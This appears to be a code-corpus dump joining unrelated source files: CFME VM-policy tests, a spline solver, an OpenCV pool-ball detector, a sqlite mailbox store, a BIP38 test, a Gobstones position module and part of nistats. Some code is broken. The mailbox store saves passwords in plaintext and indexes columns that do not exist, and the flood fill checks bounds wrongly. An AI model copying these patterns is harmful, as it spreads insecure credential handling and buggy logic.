[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_power_on_audit(request, vm, vm_off, appliance, policy_for_testing):
""" This test tests action 'Generate Audit Event'.
This test sets the policy that it logs powering on of the VM. Then it powers up the vm and
checks whether audit logs contain message about that.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On", ["Generate Audit Event"])
request.addfinalizer(policy_for_testing.assign_events)
# Start the VM
vm.start_vm()
policy_desc = policy_for_testing.description
# Search the logs
def search_logs():
rc, stdout = appliance.ssh_client.run_command(
"cat /var/www/miq/vmdb/log/audit.log | grep '{}'".format(policy_desc)
)
if rc != 0: # Nothing found, so shortcut
return False
for line in stdout.strip().split("\n"):
if "Policy success" not in line or "MiqAction.action_audit" not in line:
continue
match_string = "policy: [{}], event: [VM Power On]".format(policy_desc)
if match_string in line:
logger.info("Found corresponding log message: %s", line.strip())
return True
else:
return False
wait_for(search_logs, num_sec=180, message="log search")
@pytest.mark.provider([VMwareProvider], scope="module")
def test_action_create_snapshot_and_delete_last(request, action_collection,
vm, vm_on, policy_for_testing):
""" This test tests actions 'Create a Snapshot' (custom) and 'Delete Most Recent Snapshot'.
This test sets the policy that it makes snapshot of VM after it's powered off and when it is
powered back on, it deletes the last snapshot.
Metadata:
test_flag: actions, provision
"""
if not hasattr(vm.crud, "total_snapshots"):
pytest.skip("This provider does not support snapshots yet!")
# Set up the policy and prepare finalizer
snapshot_name = fauxfactory.gen_alphanumeric()
snapshot_create_action = action_collection.create(
fauxfactory.gen_alphanumeric(),
action_type="Create a Snapshot",
action_values={"snapshot_name": snapshot_name}
)
policy_for_testing.assign_actions_to_event("VM Power Off", [snapshot_create_action])
policy_for_testing.assign_actions_to_event("VM Power On", ["Delete Most Recent Snapshot"])
@request.addfinalizer
def finalize():
policy_for_testing.assign_events()
snapshot_create_action.delete()
snapshots_before = vm.crud.total_snapshots
# Power off to invoke snapshot creation
vm.stop_vm()
wait_for(lambda: vm.crud.total_snapshots > snapshots_before, num_sec=800,
message="wait for snapshot appear", delay=5)
assert vm.crud.current_snapshot_description == "Created by EVM Policy Action"
assert vm.crud.current_snapshot_name == snapshot_name
# Snapshot created and validated, so let's delete it
snapshots_before = vm.crud.total_snapshots
# Power on to invoke last snapshot deletion
vm.start_vm()
wait_for(lambda: vm.crud.total_snapshots < snapshots_before, num_sec=800,
message="wait for snapshot deleted", delay=5)
@pytest.mark.provider([VMwareProvider], scope="module")
def test_action_create_snapshots_and_delete_them(request, action_collection, vm, vm_on,
policy_for_testing):
""" This test tests actions 'Create a Snapshot' (custom) and 'Delete all Snapshots'.
This test sets the policy that it makes snapshot of VM after it's powered off and then it cycles
several time that it generates a couple of snapshots. Then the 'Delete all Snapshots' is
assigned to power on event, VM is powered on and it waits for all snapshots to disappear.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
snapshot_name = fauxfactory.gen_alphanumeric()
snapshot_create_action = action_collection.create(
fauxfactory.gen_alphanumeric(),
action_type="Create a Snapshot",
action_values={"snapshot_name": snapshot_name}
)
policy_for_testing.assign_actions_to_event("VM Power Off", [snapshot_create_action])
@request.addfinalizer
def finalize():
policy_for_testing.assign_events()
snapshot_create_action.delete()
def create_one_snapshot(n):
"""
Args:
n: Sequential number of snapshot for logging.
"""
# Power off to invoke snapshot creation
snapshots_before = vm.crud.total_snapshots
vm.stop_vm()
wait_for(lambda: vm.crud.total_snapshots > snapshots_before, num_sec=800,
message="wait for snapshot %d to appear" % (n + 1), delay=5)
current_snapshot = vm.crud.current_snapshot_name
logger.debug('Current Snapshot Name: {}'.format(current_snapshot))
assert current_snapshot == snapshot_name
vm.start_vm()
for i in range(4):
create_one_snapshot(i)
policy_for_testing.assign_events()
vm.stop_vm()
policy_for_testing.assign_actions_to_event("VM Power On", ["Delete all Snapshots"])
# Power on to invoke all snapshots deletion
vm.start_vm()
wait_for(lambda: vm.crud.total_snapshots == 0, num_sec=800,
message="wait for snapshots to be deleted", delay=5)
@pytest.mark.provider([VMwareProvider], scope="module")
def test_action_initiate_smartstate_analysis(request, configure_fleecing, vm, vm_off,
policy_for_testing):
""" This test tests actions 'Initiate SmartState Analysis for VM'.
This test sets the policy that it analyses VM after it's powered on. Then it checks whether
that really happened.
Metadata:
test_flag: actions, provision
"""
# Set up the policy and prepare finalizer
policy_for_testing.assign_actions_to_event("VM Power On",
["Initiate SmartState Analysis for VM"])
request.addfinalizer(policy_for_testing.assign_events)
# Start the VM
vm.crud.power_control_from_cfme(option=vm.crud.POWER_ON, cancel=False, from_details=True)
vm.crud.load_details()
wait_for_ssa_enabled()
try:
do_scan(vm.crud)
except TimedOutError:
pytest.fail("CFME did not finish analysing the VM {}".format(vm.name))
# TODO: Rework to use REST
# def test_action_raise_automation_event(
# request, policy_for_testing, vm, vm_on, ssh_client, vm_crud_refresh):
# """ This test tests actions 'Raise Automation Event'.
# This test sets the policy that it raises an automation event VM after it's powered on.
# Then it checks logs whether that really happened.
# Metadata:
# test_flag: actions, provision
# """
# # Set up the policy and prepare finalizer
# policy_for_testing.assign_actions_to_event("VM Power Off", ["Raise Automation Event"])
# request.addfinalizer(lambda: policy_for_testing.assign_events())
# # Start the VM
# vm.stop_vm()
# vm_crud_refresh()
# # Search the logs
# def search_logs():
# rc, stdout = ssh_client.run_command(
# "cat /var/www/miq/vmdb/log/automation.log | grep 'MiqAeEvent.build_evm_event' |"
# " grep 'event=<\"vm_poweroff\">' | grep 'id: {}'".format(vm.api.object.id)
# # not guid, but the ID
# )
# if rc != 0: # Nothing found, so shortcut
# return False
# found = [event for event in stdout.strip().split("\n") if len(event) > 0]
# if not found:
# return False
# else:
# logger.info("Found event: `%s`", event[-1].strip())
# return True
# wait_for(search_logs, num_sec=180, message="log search")
# Purely custom actions
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_tag(request, vm, vm_off, policy_for_testing, action_collection):
""" Tests action tag
Metadata:
test_flag: actions, provision
"""
if any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()):
vm.crud.remove_tag("Service Level", "Gold")
tag_assign_action = action_collection.create(
fauxfactory.gen_alphanumeric(),
action_type="Tag",
action_values={"tag": ("My Company Tags", "Service Level", "Gold")}
)
policy_for_testing.assign_actions_to_event("VM Power On", [tag_assign_action])
@request.addfinalizer
def finalize():
policy_for_testing.assign_events()
tag_assign_action.delete()
vm.start_vm()
try:
wait_for(
lambda: any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()),
num_sec=600,
message="tag presence check"
)
except TimedOutError:
pytest.fail("Tags were not assigned!")
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_untag(request, vm, vm_off, policy_for_testing, action_collection):
""" Tests action untag
Metadata:
test_flag: actions, provision
"""
if not any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()):
vm.crud.add_tag("Service Level", "Gold")
@request.addfinalizer
def _remove_tag():
if any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()):
vm.crud.remove_tag("Service Level", "Gold")
tag_unassign_action = action_collection.create(
fauxfactory.gen_alphanumeric(),
action_type="Remove Tags",
action_values={"remove_tag": ["Service Level"]}
)
policy_for_testing.assign_actions_to_event("VM Power On", [tag_unassign_action])
@request.addfinalizer
def finalize():
policy_for_testing.assign_events()
tag_unassign_action.delete()
vm.start_vm()
try:
wait_for(
lambda: not any(tag.category.display_name == "Service Level" and
tag.display_name == "Gold" for tag in vm.crud.get_tags()),
num_sec=600,
message="tag presence check"
)
except TimedOutError:
pytest.fail("Tags were not unassigned!")
@pytest.mark.provider([VMwareProvider], scope="module")
@pytest.mark.meta(blockers=[1381255])
def test_action_cancel_clone(appliance, request, provider, vm_name, vm_big, policy_for_testing):
"""This test checks if 'Cancel vCenter task' action works.
For this test we need big template otherwise CFME won't have enough time
to cancel the task https://bugzilla.redhat.com/show_bug.cgi?id=1383372#c9
"""
with update(policy_for_testing):
policy_for_testing.scope = (
"fill_field(VM and Instance : Name, INCLUDES, {})".format(vm_big.name))
policy_for_testing.assign_events("VM Clone Start")
policy_for_testing.assign_actions_to_event(
"VM Clone Start", ["Cancel vCenter Task"])
clone_vm_name = "{}-clone".format(vm_big.name)
@request.addfinalizer
def finalize():
policy_for_testing.assign_events()
with update(policy_for_testing):
policy_for_testing.scope = (
"fill_field(VM and Instance : Name, INCLUDES, {})".format(vm_name))
cleanup_vm(clone_vm_name, provider)
vm_big.crud.clone_vm(fauxfactory.gen_email(), "first", "last", clone_vm_name, "VMware")
request_description = clone_vm_name
clone_request = appliance.collections.requests.instantiate(description=request_description,
partial_check=True)
clone_request.wait_for_request(method='ui')
assert clone_request.status == "Error"
@pytest.mark.provider(
[VMwareProvider, RHEVMProvider, OpenStackProvider, AzureProvider],
scope="module"
)
def test_action_check_compliance(request, provider, vm, vm_name, policy_for_testing):
"""Tests action "Check Host or VM Compliance". Policy profile should have control and compliance
policies. Control policy initiates compliance check and compliance policy determines is the vm
compliant or not. After reloading vm details screen the compliance status should be changed.
"""
if any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()):
vm.crud.remove_tag("Service Level", "Gold")
@request.addfinalizer
def _remove_tag():
if any(tag.category.display_name == "Service Level" and tag.display_name == "Gold"
for tag in vm.crud.get_tags()):
vm.crud.remove_tag("Service Level", "Gold")
policy_for_testing.assign_actions_to_event("Tag Complete", ["Check Host or VM Compliance"])
request.addfinalizer(policy_for_testing.assign_events)
vm.crud.add_tag("Service Level", "Gold")
view = navigate_to(vm.crud, "Details")
view.toolbar.reload.click()
assert vm.crud.compliant
| gpl-2.0 | -4,068,996,813,163,299,300 | 36.584653 | 100 | 0.667304 | false |
saisai/algorithms_by_other | splinte-interplation/spline-interpolation.py | 1 | 2896 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def niceCubicPolynomial(p):
tmp = ""
if p["a"] == 1:
tmp += " x^3"
elif p["a"] != 0:
tmp += "%.2fx^3" % p["a"]
if p["b"] == 1:
tmp += "\t+ x^2"
elif p["b"] != 0:
tmp += "\t+ %.2fx^2" % p["b"]
else:
tmp += "\t\t"
if p["c"] == 1:
tmp += "\t+ x"
elif p["c"] != 0:
tmp += "\t+ %.2fx" % p["c"]
else:
tmp += "\t\t"
if p["d"] != 0:
tmp += "\t+ %.2f" % p["d"]
return tmp
def getSpline(points):
""" points should be a list of maps,
where each map represents a point and has "x" and "y" """
import numpy, scipy.linalg
# sort points by x value
points = sorted(points, key=lambda point: point["x"])
n = len(points) - 1
# Set up a system of equations of form Ax=b
A = numpy.zeros(shape=(4*n,4*n))
b = numpy.zeros(shape=(4*n,1))
for i in range(0, n):
# 2n equations from condtions (S2)
A[i][4*i+0] = points[i]["x"]**3
A[i][4*i+1] = points[i]["x"]**2
A[i][4*i+2] = points[i]["x"]
A[i][4*i+3] = 1
b[i] = points[i]["y"]
A[n+i][4*i+0] = points[i+1]["x"]**3
A[n+i][4*i+1] = points[i+1]["x"]**2
A[n+i][4*i+2] = points[i+1]["x"]
A[n+i][4*i+3] = 1
b[n+i] = points[i+1]["y"]
# 2n-2 equations for (S3):
if i == 0:
continue
# point i is an inner point
A[2*n+(i-1)][4*(i-1)+0] = 3*points[i]["x"]**2
A[2*n+(i-1)][4*(i-1)+1] = 2*points[i]["x"]
A[2*n+(i-1)][4*(i-1)+2] = 1
A[2*n+(i-1)][4*(i-1)+0+4] = -3*points[i]["x"]**2
A[2*n+(i-1)][4*(i-1)+1+4] = -2*points[i]["x"]
A[2*n+(i-1)][4*(i-1)+2+4] = -1
b[2*n+(i-1)] = 0
A[3*n+(i-1)][4*(i-1)+0] = 6*points[i]["x"]
A[3*n+(i-1)][4*(i-1)+1] = 2
A[3*n+(i-1)][4*(i-1)+0+4] = -6*points[i]["x"]
A[3*n+(i-1)][4*(i-1)+1+4] = -2
b[3*n+(i-1)] = 0
# Natural spline:
A[3*n-1+0][0+0] += 6*points[0]["x"]
A[3*n-1+0][0+1] += 2
b[3*n-1+0] += 0
A[3*n+n-1][4*(n-1)+0] += 6*points[n]["x"]
A[3*n+n-1][4*(n-1)+1] += 2
b[3*n+n-1] += 0
x = scipy.linalg.solve(A, b)
spline = []
for i in range(0, n):
spline.append({"u": points[i]["x"], "v": points[i+1]["x"],
"a": float(x[4*i+0]),
"b": float(x[4*i+1]),
"c": float(x[4*i+2]),
"d": float(x[4*i+3])})
return spline
if __name__ == "__main__":
points = []
points.append({"x": 0.0, "y": -4})
points.append({"x": 1.0, "y": 9})
points.append({"x": 2.0, "y": 35})
points.append({"x": 3.0, "y": 70})
spline = getSpline(points)
for p in spline:
tmp = "[%.2f, %.2f]:" % (p["u"], p["v"])
tmp += niceCubicPolynomial(p)
print(tmp)
| mit | -5,942,451,878,458,563,000 | 27.96 | 66 | 0.397099 | false |
Edeleon4/PoolShark | scripts/hist.py | 1 | 2214 | import cv2
import numpy as np
frame = cv2.imread('/mnt/c/Users/T-HUNTEL/Desktop/hackathon/table3.jpg')
h,w,c = frame.shape
print frame.shape
# Convert BGR to HSV
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
BORDER_COLOR = 0
def flood_fill(image, x, y, value):
count = 1
points = [(x, y)]
"Flood fill on a region of non-BORDER_COLOR pixels."
if x >= image.shape[1] or y >= image.shape[0] or image[x,y] == BORDER_COLOR:
return None, None
edge = [(x, y)]
image[x, y] = value
while edge:
newedge = []
for (x, y) in edge:
for (s, t) in ((x+1, y), (x-1, y), (x, y+1), (x, y-1)):
if s <= image.shape[1] and y <= image.shape[0] and \
image[s, t] not in (BORDER_COLOR, value):
image[s, t] = value
points.append((s, t))
count += 1
newedge.append((s, t))
edge = newedge
return count, points
# thresholds for different balls / background
low_bkg = np.array([15, 40, 50], dtype=np.uint8)
high_bkg = np.array([40, 190, 200], dtype=np.uint8)
lower_blue = np.array([110,50,50], dtype=np.uint8)
upper_blue = np.array([130,255,255], dtype=np.uint8)
low_yellow = np.array([20, 30, 30], dtype=np.uint8)
high_yellow = np.array([30, 255, 255], dtype=np.uint8)
# mask out the background
mask = cv2.inRange(hsv, low_bkg, high_bkg)
mask = np.invert(mask)
# Bitwise-AND mask and original image
objects = cv2.bitwise_and(frame,frame, mask= mask)
hsv = cv2.cvtColor(objects, cv2.COLOR_BGR2HSV)
# mask the yellow balls
mask = cv2.inRange(hsv, low_yellow, high_yellow)
yellows = cv2.bitwise_and(objects, objects, mask=mask)
# find the biggest cloud of 1's in the yellow mask
biggest_cloud = []
biggest_count = 0
image = mask / 255.
while len(np.where(image == 1)[0]) > 0:
loc = np.where(image == 1)
y = loc[0][0]
x = loc[1][0]
count, cloud = flood_fill(image, y, x, 2)
if count > biggest_count:
print count
biggest_count = count
biggest_cloud = cloud
print biggest_cloud
print biggest_count
cv2.imwrite('mask.jpg', mask)
cv2.imwrite('yellows.jpg', yellows)
cv2.imwrite('frame.jpg', frame)
| mit | -4,887,612,138,901,576,000 | 25.357143 | 80 | 0.604788 | false |
TilgalisToms/TMail | database.py | 1 | 4090 | import sqlite3
class Database:
configArray = {}
def __init__(self):
self.connect()
self.checkAndCreateTables()
# self.getConfig()
def connect(self):
self.db = sqlite3.connect('accounts.db')
def checkAndCreateTables(self):
self.connect()
c = self.db.cursor()
# c.execute('DROP TABLE `mailbox`')
c.execute('CREATE TABLE IF NOT EXISTS `mailbox` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `address` VARCHAR(255), `password` VARCHAR(255),`title` VARCHAR(255))')
c.execute('CREATE TABLE IF NOT EXISTS `config` (`sid` varchar(32) PRIMARY KEY, `value` VARCHAR(255))')
c.execute('CREATE TABLE IF NOT EXISTS `message` (`id` INTEGER PRIMARY KEY, `folder` VARCHAR(32), `html` TEXT, `sender` VARCHAR(255), `title` TEXT, `received` DATETIME, `read` INTEGER(1))')
self.db.commit()
self.db.close()
def getMailboxes(self):
self.connect()
c = self.db.cursor()
c.execute('SELECT * FROM `mailbox` ORDER BY `id` ASC')
results = c.fetchall()
array = {}
for result in results:
row = {
'id': result[0],
'address': result[1],
'password': result[2],
'imap': result[3],
'smtp': result[4],
'title': result[5]
}
array[result[0]] = row
self.db.close()
return array
def getMailbox(self,id):
self.connect()
c = self.db.cursor()
c.execute('SELECT * FROM `mailbox` WHERE `id`=?',(id, ))
results = c.fetchone()
array = {
'id':results[0],
'address':results[1],
'password':results[2],
'imap':results[3],
'smtp':results[4],
'title':results[5]
}
self.db.close()
return array
def getConfig(self):
self.connect()
c = self.db.cursor()
c.execute('SELECT * FROM `config`')
configArray = c.fetchall()
for item in configArray:
self.configArray[item[0]] = item[1]
self.db.close()
def getConfigValue(self, sid):
if self.configArray[sid] != None:
return self.configArray[sid]
else:
return False
def setConfigValue(self, sid, value):
self.connect()
c = self.db.cursor()
if self.configArray[sid] != None:
c.execute('UPDATE `config` SET `value`=? WHERE `sid`=?', (value, sid,))
else:
c.execute('INSERT OR IGNORE INTO `config` VALUES (?,?)',(sid,value,))
self.db.commit()
self.db.close()
self.configArray[sid] = value
def removeMailbox(self,id):
self.connect()
c = self.db.cursor()
c.execute('DELETE FROM `mailbox` WHERE `id`=?',(id,))
self.db.commit()
self.db.close()
def createAccount(self,data):
self.connect()
c = self.db.cursor()
c.execute('INSERT INTO `mailbox` (`address`,`password`,`title`) VALUES (?,?,?)', (
data['email'], data['password'], data['title'],
))
self.db.commit()
self.db.close()
def saveAccount(self,id,data):
self.connect()
c = self.db.cursor()
c.execute('UPDATE `mailbox` SET `address`=?, `password`=?, `title`=? WHERE `id`=?',(
data['email'],data['password'],data['title'],id,
))
self.db.commit()
self.db.close()
def getMessages(self,folder):
self.connect()
c = self.db.cursor()
c.execute('SELECT * FROM `message` WHERE `folder`=?',(folder, ))
array = {}
results = c.fetchall()
for result in results:
item = {}
item['id'] = result[0]
item['html'] = result[2]
item['sender'] = result[3]
item['title'] = result[4]
item['received'] = result[5]
item['read'] = result[6] == 1
array[result[0]] = item
self.db.close()
return array | gpl-3.0 | -5,152,533,714,615,267,000 | 30.713178 | 196 | 0.516137 | false |
SyndicateLtd/SyndicateQT | test/functional/rpc_bip38.py | 1 | 1058 | #!/usr/bin/env python3
# Copyright (c) 2018 The PIVX developers
# Copyright (c) 2018 The Syndicate Ltd developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPC commands for BIP38 encrypting and decrypting addresses."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class Bip38Test(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def run_test(self):
password = 'test'
address = self.nodes[0].getnewaddress()
privkey = self.nodes[0].dumpprivkey(address)
self.log.info('encrypt address %s' % (address))
bip38key = self.nodes[0].bip38encrypt(address, password)['Encrypted Key']
self.log.info('decrypt bip38 key %s' % (bip38key))
assert_equal(self.nodes[1].bip38decrypt(bip38key, password)['Address'], address)
if __name__ == '__main__':
Bip38Test().main()
| mit | -5,341,882,262,782,369,000 | 36.785714 | 88 | 0.695652 | false |
arypbatista/gobspy | gobspyide/common/position.py | 1 | 4075 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2017 Ary Pablo Batista <[email protected]>, Pablo Barenbaum <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import os
import common.i18n as i18n
from common.utils import *
#### Tracking of positions inside source files.
####
#### ProgramElements are elements inside a program, typically
#### tokens or AST nodes.
####
#### ProgramAreas are specific regions of the program, such
#### as the area after a given token.
class ProgramElement(object):
"""Represents an element inside a program. Subclasses should implement:
pos_begin: starting position
pos_end: final position
description(): human readable description"""
def source(self):
return self.pos_begin.string[self.pos_begin.start:self.pos_end.start]
class Position(object):
"Represents a position in a source file or string."
def __init__(self, string, filename='...', start=0, row=1, col=1):
self.string = string
self._filename = filename
self.start = start
self.row = row
self.col = col
def after_reading(self, string):
"""Returns the position that results after reading the characters
in the string."""
new_start = self.start + len(string)
newlines = string.count('\n')
new_row = self.row + newlines
if newlines == 0:
new_col = self.col + len(string)
else:
new_col = len(string) - string.rindex('\n')
return Position(self.string, self._filename, new_start, new_row, new_col)
def __repr__(self):
return '%s:%s:%s' % (self._filename, self.row, self.col)
def filename(self):
return self._filename
def row_col(self):
return '%s %s, %s %s' % (i18n.i18n('line'), self.row, i18n.i18n('column'), self.col)
def file_row_col(self):
return '%s (%s)' % (self.filename(), self.row_col())
def file_row(self):
return '(%s:%s)' % (self.filename(), self.row)
def line_before(self):
try:
r = self.string.rindex('\n', 0, self.start)
res = self.string[r + 1:self.start]
except ValueError:
res = self.string[:self.start]
return expand_tabs(res)
def two_lines_after(self):
try:
r1 = self.string.index('\n', self.start)
l1 = self.string[self.start:r1]
try:
r2 = self.string.index('\n', r1 + 1)
l2 = self.string[r1+1:r2]
res = [l1, l2]
except ValueError:
res = [l1]
except ValueError:
res = [self.string[self.start:]]
return map(expand_tabs, res)
class ProgramArea(object):
"Represents an area of a program."
def __repr__(self): return '(...)'
class ProgramAreaNear(ProgramArea):
"""Represents the area of a program that occurs near the beggining of
a given program element."""
def __init__(self, elem):
self.elem = elem
def __repr__(self):
l1 = '%s\n%s %s' % (self.elem.pos_begin.file_row_col(),
i18n.i18n('near'), self.elem.description())
before = self.elem.pos_begin.line_before()
after = self.elem.pos_end.two_lines_after()
ind = ' ' * len(before)
l2 = ind + '|' + '\n' + ind + 'V'
src = self.elem.source()
if len(src) < 50:
l3 = '%s%s%s' % (before, src, after[0])
if len(after) > 1: l3 += '\n'
else:
l3 = '%s%s' % (before, src[:50])
if src[-1] != '\n': l3 += '...\n'
return '\n'.join(['--', l1, l2, l3, '--'])
def interval(self):
return self.elem.pos_begin, self.elem.pos_end
def filename(self):
return self.elem.pos_begin.filename()
| gpl-3.0 | 1,046,354,306,264,107,000 | 33.82906 | 103 | 0.637301 | false |
nistats/nistats | nistats/design_matrix.py | 1 | 17077 | """
This module implements fMRI Design Matrix creation.
Design matrices are represented by Pandas DataFrames
Computations of the different parts of the design matrix are confined
to the make_first_level_design_matrix function, that create a DataFrame
All the others are ancillary functions.
Design matrices contain three different types of regressors:
1. Task-related regressors, that result from the convolution
of the experimental paradigm regressors with hemodynamic models
A hemodynamic model is one of:
- 'spm' : linear filter used in the SPM software
- 'glover' : linear filter estimated by G.Glover
- 'spm + derivative', 'glover + derivative': the same linear models,
plus their time derivative (2 regressors per condition)
- 'spm + derivative + dispersion', 'glover + derivative + dispersion':
idem plus the derivative wrt the dispersion parameter of the hrf
(3 regressors per condition)
- 'fir' : finite impulse response model, generic linear filter
2. User-specified regressors, that represent information available on
the data, e.g. motion parameters, physiological data resampled at
the acquisition rate, or sinusoidal regressors that model the
signal at a frequency of interest.
3. Drift regressors, that represent low_frequency phenomena of no
interest in the data; they need to be included to reduce variance
estimates.
Author: Bertrand Thirion, 2009-2015
"""
from __future__ import with_statement
import sys
from warnings import warn
import numpy as np
import pandas as pd
from .experimental_paradigm import check_events
from .hemodynamic_models import compute_regressor, _orthogonalize
from .utils import full_rank, _basestring
######################################################################
# Ancillary functions
######################################################################
def _poly_drift(order, frame_times):
"""Create a polynomial drift matrix
Parameters
----------
order : int,
Number of polynomials in the drift model.
frame_times : array of shape(n_scans),
Time stamps used to sample polynomials.
Returns
-------
pol : ndarray, shape(n_scans, order + 1)
estimated polynomial drifts plus a constant regressor
"""
order = int(order)
pol = np.zeros((np.size(frame_times), order + 1))
tmax = float(frame_times.max())
for k in range(order + 1):
pol[:, k] = (frame_times / tmax) ** k
pol = _orthogonalize(pol)
pol = np.hstack((pol[:, 1:], pol[:, :1]))
return pol
def _cosine_drift(high_pass, frame_times):
"""Create a cosine drift matrix with frequencies or equal to
high_pass.
Parameters
----------
high_pass : float
Cut frequency of the high-pass filter in Hz
frame_times : array of shape (n_scans,)
The sampling times in seconds
Returns
-------
cosine_drift : array of shape(n_scans, n_drifts)
Cosine drifts plus a constant regressor at cosine_drift[:, -1]
Ref: http://en.wikipedia.org/wiki/Discrete_cosine_transform DCT-II
"""
n_frames = len(frame_times)
n_times = np.arange(n_frames)
dt = (frame_times[-1] - frame_times[0]) / (n_frames - 1)
if high_pass * dt >= .5:
warn('High-pass filter will span all accessible frequencies '
'and saturate the design matrix. '
'You may want to reduce the high_pass value.'
'The provided value is {0} Hz'.format(high_pass))
order = np.minimum(n_frames - 1,
int(np.floor(2 * n_frames * high_pass * dt)))
cosine_drift = np.zeros((n_frames, order + 1))
normalizer = np.sqrt(2.0 / n_frames)
for k in range(1, order + 1):
cosine_drift[:, k - 1] = normalizer * np.cos(
(np.pi / n_frames) * (n_times + .5) * k)
cosine_drift[:, -1] = 1.
return cosine_drift
def _none_drift(frame_times):
""" Create an intercept vector
Returns
-------
np.ones_like(frame_times)
"""
return np.reshape(np.ones_like(frame_times), (np.size(frame_times), 1))
def _make_drift(drift_model, frame_times, order, high_pass):
"""Create the drift matrix
Parameters
----------
drift_model : {'polynomial', 'cosine', None},
string that specifies the desired drift model
frame_times : array of shape(n_scans),
list of values representing the desired TRs
order : int, optional,
order of the drift model (in case it is polynomial)
high_pass : float, optional,
high-pass frequency in case of a cosine model (in Hz)
Returns
-------
drift : array of shape(n_scans, n_drifts),
the drift matrix
names : list of length(n_drifts),
the associated names
"""
if isinstance(drift_model, _basestring):
drift_model = drift_model.lower() # for robust comparisons
if drift_model == 'polynomial':
drift = _poly_drift(order, frame_times)
elif drift_model == 'cosine':
drift = _cosine_drift(high_pass, frame_times)
elif drift_model is None:
drift = _none_drift(frame_times)
else:
raise NotImplementedError("Unknown drift model %r" % (drift_model))
names = []
for k in range(1, drift.shape[1]):
names.append('drift_%d' % k)
names.append('constant')
return drift, names
def _convolve_regressors(events, hrf_model, frame_times, fir_delays=[0],
min_onset=-24, oversampling=50):
""" Creation of a matrix that comprises
the convolution of the conditions onset with a certain hrf model
Parameters
----------
events : DataFrame instance,
Events data describing the experimental paradigm
see nistats.experimental_paradigm to check the specification
for these to be valid paradigm descriptors
hrf_model : {'spm', 'spm + derivative', 'spm + derivative + dispersion',
'glover', 'glover + derivative', 'glover + derivative + dispersion',
'fir', None}
String that specifies the hemodynamic response function
frame_times : array of shape (n_scans,)
The targeted timing for the design matrix.
fir_delays : array-like of shape (n_onsets,), optional,
In case of FIR design, yields the array of delays
used in the FIR model (in scans).
min_onset : float, optional (default: -24),
Minimal onset relative to frame_times[0] (in seconds) events
that start before frame_times[0] + min_onset are not considered.
oversampling: int optional, default:50,
Oversampling factor used in temporal convolutions.
Returns
-------
regressor_matrix : array of shape (n_scans, n_regressors),
Contains the convolved regressors associated with the
experimental conditions.
regressor_names : list of strings,
The regressor names, that depend on the hrf model used
if 'glover' or 'spm' then this is identical to the input names
if 'glover + derivative' or 'spm + derivative', a second name is output
i.e. '#name_derivative'
if 'spm + derivative + dispersion' or
'glover + derivative + dispersion',
a third name is used, i.e. '#name_dispersion'
if 'fir', the regressos are numbered accoding to '#name_#delay'
"""
regressor_names = []
regressor_matrix = None
trial_type, onset, duration, modulation = check_events(events)
for condition in np.unique(trial_type):
condition_mask = (trial_type == condition)
exp_condition = (onset[condition_mask],
duration[condition_mask],
modulation[condition_mask])
reg, names = compute_regressor(
exp_condition, hrf_model, frame_times, con_id=condition,
fir_delays=fir_delays, oversampling=oversampling,
min_onset=min_onset)
regressor_names += names
if regressor_matrix is None:
regressor_matrix = reg
else:
regressor_matrix = np.hstack((regressor_matrix, reg))
return regressor_matrix, regressor_names
######################################################################
# Design matrix creation
######################################################################
def make_first_level_design_matrix(
frame_times, events=None, hrf_model='glover',
drift_model='cosine', high_pass=.01, drift_order=1, fir_delays=[0],
add_regs=None, add_reg_names=None, min_onset=-24, oversampling=50):
"""Generate a design matrix from the input parameters
Parameters
----------
frame_times : array of shape (n_frames,)
The timing of acquisition of the scans in seconds.
events : DataFrame instance, optional
Events data that describes the experimental paradigm.
The DataFrame instance might have these keys:
'onset': column to specify the start time of each events in
seconds. An error is raised if this key is missing.
'trial_type': column to specify per-event experimental conditions
identifier. If missing each event are labelled
'dummy' and considered to form a unique condition.
'duration': column to specify the duration of each events in
seconds. If missing the duration of each events is set
to zero.
'modulation': column to specify the amplitude of each
events. If missing the default is set to
ones(n_events).
An experimental paradigm is valid if it has an 'onset' key
and a 'duration' key.
If these keys are missing an error will be raised.
For the others keys a warning will be displayed.
Particular attention should be given to the 'trial_type' key
which defines the different conditions in the experimental paradigm.
hrf_model : {'spm', 'spm + derivative', 'spm + derivative + dispersion',
'glover', 'glover + derivative', 'glover + derivative + dispersion',
'fir', None}, optional,
Specifies the hemodynamic response function
drift_model : {'polynomial', 'cosine', None}, optional
Specifies the desired drift model,
period_cut : float, optional
Cut period of the high-pass filter in seconds.
Used only if drift_model is 'cosine'.
drift_order : int, optional
Order of the drift model (in case it is polynomial).
fir_delays : array of shape(n_onsets) or list, optional,
In case of FIR design, yields the array of delays used in the FIR
model (in scans).
add_regs : array of shape(n_frames, n_add_reg), optional
additional user-supplied regressors, e.g. data driven noise regressors
or seed based regressors.
add_reg_names : list of (n_add_reg,) strings, optional
